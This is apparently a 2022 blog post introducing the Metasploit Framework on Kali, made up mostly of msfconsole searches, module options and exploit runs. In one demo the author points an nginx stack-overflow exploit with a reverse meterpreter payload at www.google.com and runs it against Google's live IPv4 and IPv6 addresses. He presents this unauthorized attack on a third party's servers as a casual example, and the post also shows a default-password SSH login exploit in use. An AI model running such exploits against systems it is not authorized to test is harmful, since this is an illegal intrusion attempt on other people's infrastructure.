NetSIG Summer Fun: PenTesting with Metasploit
|
by Craig Miller
This summer we'll do less presenting, and more discussing Network topics. This month we'll talk about Penetration testing with Metasploit.
The Metasploit Project is a computer security project owned by Boston, Massachusetts-based security company Rapid7. Its best-known sub-project is the open-source[2] Metasploit Framework, a tool for developing and executing exploit code against a remote target machine.
Start with Kali
Starting with Kali it will be much easier to run Metasploit Framework. In fact it can be installed with one line:
apt-get install metasploit-framework
Running Kali isn't hard, if you use a Virtual Machine, or a Linux Container. Daily builds of Kali are in the Linux Containers images: repo. Just another reason to get LXD up and running.
There's a lot of Metasploit
The main entry point into Metasploit framework is msfconsole. There is much of Metasploit Framework which is written in Ruby, which means startup on a Raspberry Pi is pretty slow (give it about a minute).
=[ metasploit v6.2.11-dev ]
+ -- --=[ 2233 exploits - 1179 auxiliary - 398 post ]
+ -- --=[ 867 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Use the resource command to run
commands from a file
msf6 >
Many of the penetration testing will require root to run. Since we are running in a container, running as root means less risk to the host OS.
Looking at available exploits
As the banner shows, there are a lot of exploits, payloads, ecetera to choose from. But where to start?
A good place to start, is to look for unix/linux exploits. In the msfconsole:
msf6 > search type:exploit platform:unix
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/apache_apisix_api_default_token_rce 2020-12-07 excellent Yes APISIX Admin API default access token RCE
1 exploit/linux/local/apt_package_manager_persistence 1999-03-09 excellent No APT Package Manager Persistence
2 exploit/linux/misc/asus_infosvr_auth_bypass_exec 2015-01-04 excellent No ASUS infosvr Auth Bypass Command Execution
3 exploit/unix/webapp/awstatstotals_multisort 2008-08-26 excellent Yes AWStats Totals multisort Remote Command Execution
4 exploit/unix/webapp/awstats_configdir_exec 2005-01-15 excellent Yes AWStats configdir Remote Command Execution
...
405 exploit/multi/http/vbulletin_widget_template_rce 2020-08-09 excellent Yes vBulletin 5.x /ajax/render/widget_tabbedcontainer_tab_panel PHP remote code execution.
406 exploit/unix/webapp/php_vbulletin_template 2005-02-25 excellent Yes vBulletin misc.php Template Name Arbitrary Code Execution
407 exploit/multi/http/vbulletin_widgetconfig_rce 2019-09-23 excellent Yes vBulletin widgetConfig RCE
408 exploit/multi/misc/w3tw0rk_exec 2015-06-04 excellent Yes w3tw0rk / Pitbul IRC Bot Remote Code Execution
Interact with a module by name or index. For example info 408, use 408 or use exploit/multi/misc/w3tw0rk_exec
msf6 >
As you can see there are many. It is possible to do more specific searches using grep
msf6 > grep scanner search ssh
1 auxiliary/scanner/ssh/apache_karaf_command_execution 2016-02-09 normal No Apache Karaf Default Credentials Command Execution
2 auxiliary/scanner/ssh/karaf_login normal No Apache Karaf Login Utility
7 auxiliary/scanner/ssh/cerberus_sftp_enumusers 2014-05-27 normal No Cerberus FTP Server SFTP Username Enumeration
10 auxiliary/scanner/http/cisco_firepower_login normal No Cisco Firepower Management Console 6.0 Login
12 auxiliary/scanner/ssh/eaton_xpert_backdoor 2018-07-18 normal No Eaton Xpert Meter SSH Private Key Exposure Scanner
15 auxiliary/scanner/ssh/fortinet_backdoor 2016-01-09 normal No Fortinet SSH Backdoor Scanner
20 auxiliary/scanner/http/gitlab_user_enum 2014-11-21 normal No GitLab User Enumeration
26 auxiliary/scanner/ssh/juniper_backdoor 2015-12-20 normal No Juniper SSH Backdoor Scanner
27 auxiliary/scanner/ssh/detect_kippo normal No Kippo SSH Honeypot Detector
46 auxiliary/scanner/ssh/ssh_login normal No SSH Login Check Scanner
47 auxiliary/scanner/ssh/ssh_identify_pubkeys normal No SSH Public Key Acceptance Scanner
48 auxiliary/scanner/ssh/ssh_login_pubkey normal No SSH Public Key Login Scanner
50 auxiliary/scanner/ssh/ssh_enumusers normal No SSH Username Enumeration
52 auxiliary/scanner/ssh/ssh_version normal No SSH Version Scanner
63 auxiliary/scanner/ssh/ssh_enum_git_keys normal No Test SSH Github Access
71 auxiliary/scanner/ssh/libssh_auth_bypass 2018-10-16 normal No libssh Authentication Bypass Scanner
msf6 >
Running an exploit test
Many of the exploits have parameters which need to be set before the pentest can be run. To see the options, select an exploit using the use command.
msf6 > use exploit/apple_ios/ssh/cydia_default_ssh
To see the available options:
msf6 exploit(apple_ios/ssh/cydia_default_ssh) > show options
Module options (exploit/apple_ios/ssh/cydia_default_ssh):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 22 yes The target port
Payload options (cmd/unix/interact):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Apple iOS
msf6 exploit(apple_ios/ssh/cydia_default_ssh) >
A key option is RHOSTS for most exploits, telling Metasploit the target. The nice thing, is that RHOSTS can be an IPv4 or IPv6 address, or even better a DNS name which resolves to a IPv4 or IPv6 address.
msf6 exploit(apple_ios/ssh/cydia_default_ssh) > set RHOSTS 6haiku.hoomaha.net
RHOSTS => 6haiku.hoomaha.net
msf6 exploit(apple_ios/ssh/cydia_default_ssh) > run
[*] 2607:c000:8011:fd44:ea9f:80ff:fef3:fd47:22 - Attempt to login as 'root' with password 'alpine'
[-] 2607:c000:8011:fd44:ea9f:80ff:fef3:fd47:22 SSH - Failed authentication
[*] 2607:c000:8011:fd44:ea9f:80ff:fef3:fd47:22 - Attempt to login as 'mobile' with password 'dottie'
[-] 2607:c000:8011:fd44:ea9f:80ff:fef3:fd47:22 SSH - Failed authentication
[*] Exploit completed, but no session was created.
msf6 exploit(apple_ios/ssh/cydia_default_ssh) >
This is an iOS (iPhone) exploit, which in the example above is given a non-iOS device to test, so it fails, as the exploit logins are not available.
Demo against an old Win7 Machine
A tricky part of showing off a pentesting tool, is finding a target. A nice tutorial, which exploits a Win7 machine can be found on linuxhint.com
Running an exploit against a webserver, nginx
After using Apache webserver for 25 years, I have migrated to nginx which does some things nicer, and more easily that the venerable Apache. Apparently an old version of nginx has an exploit can be pentested.
msf6 > use linux/http/nginx_chunked_size
msf6 exploit(linux/http/nginx_chunked_size) > show options
Module options (exploit/linux/http/nginx_chunked_size):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 80 yes The remote HTTP server port (TCP)
Payload options (cmd/unix/python/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.215.181 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Ubuntu 13.04 32bit - nginx 1.4.0
msf6 exploit(linux/http/nginx_chunked_size) >
Note that RHOSTS and any other options you set for a previous pentest have been cleared. You will need to set them again, and then run the pentest.
msf6 exploit(linux/http/nginx_chunked_size) > set RHOSTS www.google.com
RHOSTS => www.google.com
msf6 exploit(linux/http/nginx_chunked_size) > run
[*] Exploiting target 2607:f8b0:400b:803::2004
[*] Started reverse TCP handler on 192.168.215.181:4444
[*] 2607:f8b0:400b:803::2004:80 - Searching for stack canary
[*] 2607:f8b0:400b:803::2004:80 - Assuming byte 0 0x00
[*] 2607:f8b0:400b:803::2004:80 - Brute forcing byte 1
[+] 2607:f8b0:400b:803::2004:80 - Byte 1 found: 0x00
[*] 2607:f8b0:400b:803::2004:80 - Brute forcing byte 2
[+] 2607:f8b0:400b:803::2004:80 - Byte 2 found: 0x00
[*] 2607:f8b0:400b:803::2004:80 - Brute forcing byte 3
[+] 2607:f8b0:400b:803::2004:80 - Byte 3 found: 0x00
[-] 2607:f8b0:400b:803::2004:80 - Exploit aborted due to failure: unknown: 2607:f8b0:400b:803::2004:80 - Unable to find stack canary
[*] Exploiting target 172.217.14.196
[*] Started reverse TCP handler on 192.168.215.181:4444
[*] 172.217.14.196:80 - Searching for stack canary
[*] 172.217.14.196:80 - Assuming byte 0 0x00
[*] 172.217.14.196:80 - Brute forcing byte 1
[+] 172.217.14.196:80 - Byte 1 found: 0x00
[*] 172.217.14.196:80 - Brute forcing byte 2
[+] 172.217.14.196:80 - Byte 2 found: 0x00
[*] 172.217.14.196:80 - Brute forcing byte 3
[+] 172.217.14.196:80 - Byte 3 found: 0x00
[-] 172.217.14.196:80 - Exploit aborted due to failure: unknown: 172.217.14.196:80 - Unable to find stack canary
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/nginx_chunked_size) >
Since www.google.com resolves to both an IPv4 and IPv6 address, the exploit pentest is run against both IP addresses.
Knowledge is important
This introduction won't turn you into instant Metasploit Framework pentesters. For example, www.google.com isn't using nginx as a webserver, so naturally the nginx exploit would fail. A simple look with curl will tell you what kind of web server Google is using:
$ curl -I https://www.google.com
HTTP/2 200
content-type: text/html; charset=ISO-8859-1
p3p: CP="This is not a P3P policy! See g.co/p3phelp for more info."
date: Thu, 18 Aug 2022 21:55:39 GMT
server: gws
And a quick check for exploits against gws using the msfconsole will show that there are none included.
Metasploit Framework & Pentesting
Metasploit Framework is a great tool for Pentesting. Not only are there a large body of included exploits, but you can create your own via rcscripts.
If you want to learn more about Metasploit Framework, and pentesting, search online, there is a ton of information.
18 August 2022